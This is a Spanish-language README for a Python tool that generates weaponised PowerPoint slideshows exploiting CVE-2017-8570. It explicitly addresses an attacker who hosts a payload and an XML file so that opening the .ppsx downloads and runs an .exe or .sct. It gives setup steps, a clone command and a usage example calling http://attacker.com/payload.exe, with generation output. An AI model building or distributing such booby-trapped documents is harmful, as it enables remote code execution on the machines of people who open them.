
generador de archivos ppsx para cve-2017-8570 (basado en bhdresh/cve-2017-8570)
Por Temesgen Yibeltal [email protected] (Basado en el código de https://github.com/bhdresh/CVE-2017-8570 (ahora eliminado))
ppsx-file-generator es una herramienta Python que genera un archivo de presentación de diapositivas de Power Point que ejecuta código desde una fuente remota basándose en un archivo existente.
La herramienta genera un archivo de presentación de diapositivas de Power Point y un archivo xml con base en la entrada proporcionada. El archivo de Power Point accede al archivo xml que contiene información del archivo payload. Un atacante podría servir el archivo xml y el payload en un servidor local o público y proporcionar la url de cada uno como entrada.
Primero, obtén el código:
git clone https://github.com/temesgeny/ppsx-file-generator.git
ppsx-file-generator está escrito en Python y requiere zipfile, el cual puede instalarse usando Pip:
pip install zipfile
Requiere Microsoft Office Power Point para realizar esta tarea.
Primero abre Microsoft Office Power Point y abre 'template.ppsx'. Abre tu propio archivo de presentación y copia el icono 'Coder.exe' desde template.ppsx a la diapositiva 1 de tu archivo de Power Point. Guarda el archivo como Presentación de Power Point (.ppsx). Luego usa la herramienta python como
Uso: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
input_filename El nombre del archivo ppsx de entrada.
-o Nombre del archivo .ppsx de salida (incluye el .ppsx).
-p La url del archivo exe o sct del payload.
Debe estar en un servidor web accesible. (Opcional para el archivo xml)
-x La uri completa del xml que será llamado por el archivo ppsx.
Debe estar en un servidor web accesible. (Requerido)
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully